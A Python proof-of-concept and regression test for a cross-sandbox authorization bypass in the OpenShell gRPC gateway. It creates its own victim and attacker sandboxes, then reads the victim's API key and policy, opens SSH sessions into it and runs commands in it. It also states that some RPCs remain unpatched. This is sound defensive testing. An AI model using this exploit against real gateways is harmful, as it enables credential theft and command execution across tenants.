#!/usr/bin/env python3 # SPDX-FileCopyrightText: Copyright (c) 2025-2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 """ Reproducer: Cross-Sandbox Authorization Bypass via IDOR ======================================================= Product : NVIDIA OpenShell (openshell-server gRPC gateway) Version : 0.0.8-dev.5 (commit 925160e84, main branch) CWE : CWE-639 - Insecure Direct Object Reference CVSS : 7.7 (High) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N Vulnerability ------------- Sandbox-scoped gRPC RPCs accept an arbitrary sandbox_id with no ownership or authorization check. All sandbox pods and the CLI share a single mTLS client certificate (CN=openshell-client), so the server cannot distinguish callers at the TLS layer. This allows any sandbox (or any holder of the shared cert) to: - Read another sandbox's provider credentials (API keys) via GetSandboxProviderEnvironment - Read another sandbox's policy via GetSandboxPolicy - Create SSH sessions into another sandbox via CreateSshSession - Execute arbitrary commands inside another sandbox via ExecSandbox The impact is amplified by the optional unauthenticated edge mode where no mTLS is required at all. What this script tests ---------------------- The script creates two sandboxes: a VICTIM (with a secret API key) and an ATTACKER (separate, no provider). It then calls sandbox-scoped RPCs using the victim's sandbox_id from the attacker's perspective (the same mTLS connection, no per-sandbox authorization token). Tested RPCs: 1. GetSandboxProviderEnvironment - no token (attacker reads victim creds) 2. GetSandboxProviderEnvironment - fabricated token against victim 3. GetSandboxPolicy - no token (attacker reads victim policy) 4. CreateSshSession - no token (attacker gets SSH into victim) 5. ExecSandbox - no token (attacker runs commands in victim) Tests 1-3 target RPCs that were hardened by the fix (should reject on patched servers). Tests 4-5 target write-side RPCs (CreateSshSession, ExecSandbox) which remain unprotected at the time of writing. Tests 4-5 require the sandbox pod to be in Ready phase. Use --wait-ready to poll until the sandbox controller has provisioned the pod (default timeout: 120s). Without --wait-ready, write-side tests will be INCONCLUSIVE if pods are not yet running. Limitations ----------- Legacy sandbox caveat: The patched server's validate_sandbox_token() allows unrestricted access to sandboxes whose sandbox_token_hash is empty (created before token enforcement). This script only creates fresh sandboxes, which always receive a token hash, so it cannot exercise that legacy compatibility path. A "FIXED" result here does not prove legacy sandboxes are protected. Test 2 uses a fabricated UUID-format token, not the attacker sandbox's real OPENSHELL_SANDBOX_TOKEN. The real token is only available inside the attacker's pod (injected as an environment variable during pod creation) and is not returned by the CreateSandbox API. A full cross- sandbox token replay test would require exec'ing into the attacker pod to retrieve it. On unpatched servers this distinction is irrelevant since no token validation exists. On patched servers, the fabricated token still proves the server rejects non-matching tokens, but would not catch a hypothetical regression that accepts any valid-for-some- sandbox token. Tests 4-5 (CreateSshSession, ExecSandbox) will be INCONCLUSIVE when the sandbox pod is not actually running, because the server rejects with FAILED_PRECONDITION before reaching any authorization logic. Use --wait-ready to wait for pod provisioning. The absence of validate_sandbox_token() in both handlers is confirmed by source inspection (see grpc.rs create_ssh_session and exec_sandbox). Error classification: Tests 1-3 only count UNAUTHENTICATED or PERMISSION_DENIED as proof that the authorization fix is active. Any other gRPC error (NOT_FOUND, INTERNAL, UNAVAILABLE, etc.) is recorded as INCONCLUSIVE to avoid false confidence from transport or unrelated server failures. Prerequisites ------------- 1. A running OpenShell gateway (openshell gateway start) 2. Python 3.10+ with grpcio and protobuf 3. Generated proto stubs in python/openshell/_proto/ 4. mTLS certs at ~/.config/openshell/gateways//mtls/ Usage ----- Read-side tests only (fast, no pod wait): PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py Full test including write-side (waits for pod provisioning): PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\ --wait-ready With custom endpoint, gateway name, or timeout: PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\ --wait-ready --ready-timeout 180 --endpoint 127.0.0.1:8080 --gateway openshell PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\ --plaintext --endpoint 127.0.0.1:9090 Expected results ---------------- VULNERABLE (unpatched): All tests return data - API keys leaked, SSH session created, commands executed, policy disclosed. FIXED (patched): Tests 1-3 are rejected with UNAUTHENTICATED or PERMISSION_DENIED. Tests 4-5 may still succeed (CreateSshSession and ExecSandbox are not yet gated). Note: "FIXED" only covers fresh sandboxes. Legacy sandboxes with empty token hashes are still allowed through by the patch. """ from __future__ import annotations import argparse import pathlib import sys import time import grpc from openshell._proto import ( datamodel_pb2, openshell_pb2, openshell_pb2_grpc, sandbox_pb2, ) def parse_args() -> argparse.Namespace: p = argparse.ArgumentParser( description="Reproduce cross-sandbox authorization bypass in OpenShell gateway", ) p.add_argument( "--endpoint", default="127.0.0.1:8080", help="Gateway gRPC endpoint (default: 127.0.0.1:8080)", ) p.add_argument( "--gateway", default="openshell", help="Gateway name for mTLS cert lookup (default: openshell)", ) p.add_argument( "--plaintext", action="store_true", help="Use insecure plaintext channel (skip mTLS)", ) p.add_argument( "--wait-ready", action="store_true", help="Wait for victim sandbox pod to reach Ready before running " "write-side tests (CreateSshSession, ExecSandbox). Without this " "flag, write-side tests may be INCONCLUSIVE.", ) p.add_argument( "--ready-timeout", type=int, default=120, help="Seconds to wait for sandbox Ready when --wait-ready is set " "(default: 120)", ) return p.parse_args() def make_channel(args: argparse.Namespace) -> grpc.Channel: if args.plaintext: return grpc.insecure_channel(args.endpoint) mtls_dir = ( pathlib.Path.home() / ".config" / "openshell" / "gateways" / args.gateway / "mtls" ) ca_pem = (mtls_dir / "ca.crt").read_bytes() cert_pem = (mtls_dir / "tls.crt").read_bytes() key_pem = (mtls_dir / "tls.key").read_bytes() credentials = grpc.ssl_channel_credentials( root_certificates=ca_pem, private_key=key_pem, certificate_chain=cert_pem, ) return grpc.secure_channel(args.endpoint, credentials) def delete_quietly(stub, name: str, kind: str) -> None: try: if kind == "sandbox": stub.DeleteSandbox(openshell_pb2.DeleteSandboxRequest(name=name)) elif kind == "provider": stub.DeleteProvider(openshell_pb2.DeleteProviderRequest(name=name)) except grpc.RpcError: pass def _default_policy() -> sandbox_pb2.SandboxPolicy: return sandbox_pb2.SandboxPolicy( version=1, filesystem=sandbox_pb2.FilesystemPolicy( include_workdir=True, read_only=["/usr", "/lib", "/etc"], read_write=["/sandbox", "/tmp"], ), process=sandbox_pb2.ProcessPolicy( run_as_user="sandbox", run_as_group="sandbox", ), ) def wait_for_sandbox_ready( stub, sandbox_id: str, timeout: int = 120, poll_interval: int = 3, ) -> bool: """Poll CreateSshSession until sandbox is Ready or timeout expires. Returns True if sandbox reached Ready, False on timeout. We use CreateSshSession as the probe because it returns FAILED_PRECONDITION when the sandbox phase is not Ready, and succeeds (or returns an authz error) when it is. """ deadline = time.monotonic() + timeout attempt = 0 while time.monotonic() < deadline: attempt += 1 try: resp = stub.CreateSshSession( openshell_pb2.CreateSshSessionRequest(sandbox_id=sandbox_id) ) stub.RevokeSshSession( openshell_pb2.RevokeSshSessionRequest(token=resp.token) ) return True except grpc.RpcError as e: if e.code() == grpc.StatusCode.FAILED_PRECONDITION: remaining = int(deadline - time.monotonic()) print(f" [{attempt}] Sandbox not ready, {remaining}s remaining...") time.sleep(poll_interval) elif e.code() in ( grpc.StatusCode.UNAUTHENTICATED, grpc.StatusCode.PERMISSION_DENIED, ): return True else: print(f" [{attempt}] Unexpected: {e.code().name}: {e.details()}") time.sleep(poll_interval) return False AUTHZ_CODES = frozenset({ grpc.StatusCode.UNAUTHENTICATED, grpc.StatusCode.PERMISSION_DENIED, }) class Result: def __init__(self): self.vulnerable = 0 self.fixed = 0 self.inconclusive = 0 self.entries: list[tuple[str, str, str]] = [] def record(self, test: str, status: str, detail: str) -> None: self.entries.append((test, status, detail)) if status == "VULNERABLE": self.vulnerable += 1 elif status == "FIXED": self.fixed += 1 else: self.inconclusive += 1 def record_rpc_error(self, test: str, e: grpc.RpcError) -> None: """Classify an RPC error as FIXED or INCONCLUSIVE. Only UNAUTHENTICATED and PERMISSION_DENIED indicate the authorization check actually fired. Any other error (NOT_FOUND, INTERNAL, UNAVAILABLE, etc.) is ambiguous and recorded as INCONCLUSIVE to avoid false confidence. """ detail = f"{e.code().name}: {e.details()}" if e.code() in AUTHZ_CODES: print(f"\n [OK] REJECTED by authorization - {detail}") self.record(test, "FIXED", detail) else: print(f"\n [??] INCONCLUSIVE - non-authz error") print(f" {detail}") self.record(test, "INCONCLUSIVE", detail) def main() -> int: args = parse_args() channel = make_channel(args) stub = openshell_pb2_grpc.OpenShellStub(channel) try: stub.Health(openshell_pb2.HealthRequest(), timeout=10) except grpc.RpcError as e: print(f"[!] Cannot reach gateway at {args.endpoint}: {e}", file=sys.stderr) return 1 print(f"[+] Connected to gateway at {args.endpoint}") SECRET_KEY = "sk-ant-SUPER-SECRET-KEY-12345" VICTIM_PROVIDER = "repro-victim-provider" VICTIM_SANDBOX = "repro-victim-sandbox" ATTACKER_SANDBOX = "repro-attacker-sandbox" result = Result() try: # ================================================================= # SETUP: Victim provider + sandbox (has secrets) # ================================================================= delete_quietly(stub, VICTIM_PROVIDER, "provider") stub.CreateProvider( openshell_pb2.CreateProviderRequest( provider=datamodel_pb2.Provider( name=VICTIM_PROVIDER, type="claude", credentials={"ANTHROPIC_API_KEY": SECRET_KEY}, ) ) ) print(f"[+] Created victim provider '{VICTIM_PROVIDER}'") print(f" Secret: {SECRET_KEY}") delete_quietly(stub, VICTIM_SANDBOX, "sandbox") victim_resp = stub.CreateSandbox( openshell_pb2.CreateSandboxRequest( name=VICTIM_SANDBOX, spec=datamodel_pb2.SandboxSpec( policy=_default_policy(), providers=[VICTIM_PROVIDER], ), ) ) victim_id = victim_resp.sandbox.id print(f"[+] Created victim sandbox '{VICTIM_SANDBOX}' (id: {victim_id})") # ================================================================= # SETUP: Attacker sandbox (no provider, separate identity) # ================================================================= delete_quietly(stub, ATTACKER_SANDBOX, "sandbox") attacker_resp = stub.CreateSandbox( openshell_pb2.CreateSandboxRequest( name=ATTACKER_SANDBOX, spec=datamodel_pb2.SandboxSpec(policy=_default_policy()), ) ) attacker_id = attacker_resp.sandbox.id print(f"[+] Created attacker sandbox '{ATTACKER_SANDBOX}' (id: {attacker_id})") print() # ================================================================= # TEST 1: GetSandboxProviderEnvironment - no token # # Attacker uses the shared mTLS cert to read the victim's # provider credentials without any per-sandbox token. # ================================================================= print("=" * 64) print("TEST 1: GetSandboxProviderEnvironment - no token") print(f" caller context = attacker (shared mTLS cert)") print(f" target = victim sandbox {victim_id}") print(f" x-sandbox-token = (none)") print("=" * 64) try: env_resp = stub.GetSandboxProviderEnvironment( openshell_pb2.GetSandboxProviderEnvironmentRequest( sandbox_id=victim_id, ) ) env = dict(env_resp.environment) leaked = env.get("ANTHROPIC_API_KEY", "") detail = f"leaked ANTHROPIC_API_KEY={leaked}" print(f"\n [!!] VULNERABLE - {detail}") result.record("GetSandboxProviderEnvironment (no token)", "VULNERABLE", detail) except grpc.RpcError as e: result.record_rpc_error("GetSandboxProviderEnvironment (no token)", e) # ================================================================= # TEST 2: GetSandboxProviderEnvironment - fabricated token # # Submits a UUID-format token that is not valid for any # sandbox. On unpatched servers, the header is ignored and # credentials are returned. On patched servers, the token # hash won't match and the call is rejected. # # NOTE: This is NOT a real cross-sandbox token replay. # The attacker's real OPENSHELL_SANDBOX_TOKEN is only # available inside the attacker pod and cannot be obtained # through the API. See the Limitations section in the # docstring for details. # ================================================================= print() print("=" * 64) print("TEST 2: GetSandboxProviderEnvironment - fabricated token") print(f" caller context = attacker (shared mTLS cert)") print(f" target = victim sandbox {victim_id}") print(f" x-sandbox-token = (fabricated UUID, not valid for any sandbox)") print("=" * 64) fabricated_token = f"aaaaaaaa-bbbb-cccc-dddd-{attacker_id[:12]}" try: env_resp = stub.GetSandboxProviderEnvironment( openshell_pb2.GetSandboxProviderEnvironmentRequest( sandbox_id=victim_id, ), metadata=[("x-sandbox-token", fabricated_token)], ) env = dict(env_resp.environment) leaked = env.get("ANTHROPIC_API_KEY", "") detail = f"leaked ANTHROPIC_API_KEY={leaked}" print(f"\n [!!] VULNERABLE - {detail}") result.record("GetSandboxProviderEnvironment (fabricated token)", "VULNERABLE", detail) except grpc.RpcError as e: result.record_rpc_error("GetSandboxProviderEnvironment (fabricated token)", e) # ================================================================= # TEST 3: GetSandboxPolicy - no token # # Attacker reads the victim's sandbox policy configuration. # GetSandboxPolicyRequest lives in sandbox_pb2 (not openshell_pb2). # ================================================================= print() print("=" * 64) print("TEST 3: GetSandboxPolicy - no token") print(f" caller context = attacker (shared mTLS cert)") print(f" target = victim sandbox {victim_id}") print(f" x-sandbox-token = (none)") print("=" * 64) try: policy_resp = stub.GetSandboxPolicy( sandbox_pb2.GetSandboxPolicyRequest( sandbox_id=victim_id, ) ) detail = f"policy version {policy_resp.version} disclosed" print(f"\n [!!] VULNERABLE - {detail}") result.record("GetSandboxPolicy (no token)", "VULNERABLE", detail) except grpc.RpcError as e: result.record_rpc_error("GetSandboxPolicy (no token)", e) # ================================================================= # WRITE-SIDE TESTS: require sandbox pod to be Ready # # CreateSshSession and ExecSandbox check sandbox phase before # doing anything, so they return FAILED_PRECONDITION when the # pod is not running. With --wait-ready, we poll until the # sandbox controller has provisioned the pod. # ================================================================= victim_ready = False if args.wait_ready: print() print("=" * 64) print(f"WAITING for victim sandbox to reach Ready " f"(timeout {args.ready_timeout}s)") print("=" * 64) victim_ready = wait_for_sandbox_ready( stub, victim_id, timeout=args.ready_timeout, ) if victim_ready: print(" Victim sandbox is Ready.") else: print(" Timed out. Write-side tests will be INCONCLUSIVE.") else: print() print("[*] Skipping sandbox Ready wait (use --wait-ready to enable)") # ================================================================= # TEST 4: CreateSshSession - no token # # Attacker creates an SSH session into the victim's sandbox. # At the time of writing, CreateSshSession does NOT call # validate_sandbox_token(), so this RPC remains unprotected # even after the read-side fix. # # Source: crates/openshell-server/src/grpc.rs, fn create_ssh_session # ================================================================= print() print("=" * 64) print("TEST 4: CreateSshSession - no token") print(f" caller context = attacker (shared mTLS cert)") print(f" target = victim sandbox {victim_id}") print(f" x-sandbox-token = (none)") print("=" * 64) try: ssh_resp = stub.CreateSshSession( openshell_pb2.CreateSshSessionRequest( sandbox_id=victim_id, ) ) detail = ( f"SSH session token issued: {ssh_resp.token[:16]}... " f"(host={ssh_resp.gateway_host}:{ssh_resp.gateway_port})" ) print(f"\n [!!] VULNERABLE - {detail}") result.record("CreateSshSession (no token)", "VULNERABLE", detail) stub.RevokeSshSession( openshell_pb2.RevokeSshSessionRequest(token=ssh_resp.token) ) except grpc.RpcError as e: detail = f"{e.code().name}: {e.details()}" if e.code() in AUTHZ_CODES: print(f"\n [OK] REJECTED by authorization - {detail}") result.record("CreateSshSession (no token)", "FIXED", detail) elif e.code() == grpc.StatusCode.FAILED_PRECONDITION: print(f"\n [??] INCONCLUSIVE - sandbox pod not running") print(f" {detail}") if not args.wait_ready: print(f" Re-run with --wait-ready to wait for pod provisioning.") result.record("CreateSshSession (no token)", "INCONCLUSIVE", detail) else: print(f"\n [??] INCONCLUSIVE - non-authz error") print(f" {detail}") result.record("CreateSshSession (no token)", "INCONCLUSIVE", detail) # ================================================================= # TEST 5: ExecSandbox - no token # # Attacker runs a command inside the victim's sandbox. # ExecSandbox does NOT call validate_sandbox_token(), so this # RPC remains unprotected even after the read-side fix. # # Source: crates/openshell-server/src/grpc.rs, fn exec_sandbox # ================================================================= print() print("=" * 64) print("TEST 5: ExecSandbox - no token") print(f" caller context = attacker (shared mTLS cert)") print(f" target = victim sandbox {victim_id}") print(f" x-sandbox-token = (none)") exec_cmd = ["hostname"] print(f" command = {exec_cmd}") print(f" expected output = '{VICTIM_SANDBOX}' (victim pod name)") print("=" * 64) try: events = stub.ExecSandbox( openshell_pb2.ExecSandboxRequest( sandbox_id=victim_id, command=exec_cmd, ) ) output_parts = [] exit_code = None for event in events: which = event.WhichOneof("payload") if which == "stdout": output_parts.append( event.stdout.data.decode("utf-8", errors="replace") ) elif which == "stderr": output_parts.append( event.stderr.data.decode("utf-8", errors="replace") ) elif which == "exit": exit_code = event.exit.exit_code output = "".join(output_parts).strip() is_victim = output == VICTIM_SANDBOX marker = "CONFIRMS victim sandbox" if is_victim else "unexpected hostname" detail = f"hostname='{output}' ({marker}, exit {exit_code})" print(f"\n [!!] VULNERABLE - {detail}") result.record("ExecSandbox (no token)", "VULNERABLE", detail) except grpc.RpcError as e: detail = f"{e.code().name}: {e.details()}" if e.code() in AUTHZ_CODES: print(f"\n [OK] REJECTED by authorization - {detail}") result.record("ExecSandbox (no token)", "FIXED", detail) elif e.code() == grpc.StatusCode.FAILED_PRECONDITION: print(f"\n [??] INCONCLUSIVE - sandbox pod not running") print(f" {detail}") if not args.wait_ready: print(f" Re-run with --wait-ready to wait for pod provisioning.") result.record("ExecSandbox (no token)", "INCONCLUSIVE", detail) else: print(f"\n [??] INCONCLUSIVE - non-authz error") print(f" {detail}") result.record("ExecSandbox (no token)", "INCONCLUSIVE", detail) # ================================================================= # SUMMARY # ================================================================= print() print("=" * 64) print("RESULTS") print("=" * 64) total = len(result.entries) print(f" Tests run: {total}") print(f" Vulnerable: {result.vulnerable}") print(f" Fixed: {result.fixed}") print(f" Inconclusive: {result.inconclusive}") print() for test, status, detail in result.entries: tags = { "VULNERABLE": "[!!]", "FIXED": "[OK]", "INCONCLUSIVE": "[??]", } tag = tags.get(status, "[--]") print(f" {tag} {test}") print(f" {detail}") print() if result.vulnerable > 0: print(" CONCLUSION: Authorization bypass CONFIRMED. (exit 2)") print(" Cross-sandbox credential exfiltration is possible.") elif result.inconclusive > 0: print(" CONCLUSION: Read-side RPCs appear fixed, but some tests") print(" returned non-authz errors or could not be validated.") print(" Review INCONCLUSIVE entries above. (exit 1)") else: print(" CONCLUSION: All tested RPCs rejected unauthorized access") print(" with explicit authz errors. (exit 0)") finally: delete_quietly(stub, ATTACKER_SANDBOX, "sandbox") delete_quietly(stub, VICTIM_SANDBOX, "sandbox") delete_quietly(stub, VICTIM_PROVIDER, "provider") print("\n[+] Cleanup complete") channel.close() if result.vulnerable > 0: return 2 if result.inconclusive > 0: return 1 return 0 if __name__ == "__main__": raise SystemExit(main())